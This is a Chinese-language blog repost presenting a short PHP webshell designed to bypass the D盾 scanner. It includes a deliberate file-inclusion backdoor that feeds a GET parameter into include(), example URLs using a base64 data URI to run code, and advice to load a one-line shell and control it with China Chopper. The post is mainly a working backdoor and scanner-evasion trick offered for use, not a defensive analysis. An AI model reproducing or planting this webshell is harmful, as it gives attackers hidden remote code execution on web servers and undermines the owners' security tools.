您的位置:首页 > 运维架构 > Shell

最新绕过D盾的php Webshell

2020-03-31 07:20 2521 查看

去年分析D盾的查杀规律弄的绕过。
查杀效果:

具体请看代码:

<?php
function cc(){
global $b;
$a =$_GET[$b];  //此处可改成POST方式
$str =$a;
return $str;
}
?>
<?php
$b="url";
$c=cc();
$aa = $c;

include($aa);

传入参数方式:

http://127.0.0.1/test/include.php?url=本地或远程文件名(或者利用data:image/png的这种格式)

例如:

http://127.0.0.1/test/include.php?url=data:image/png;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

上看base64,后面为要执行的代码,代码要带,实战中可以把代码改成一句话,然后使用菜刀连接即可。

原文地址:https://bacde.me/post/Webshellkill-Bypass-Php-Webshell/

  • 点赞
  • 收藏
  • 分享
  • 文章举报
insightglacier 发布了11 篇原创文章 · 获赞 0 · 访问量 391 私信 关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: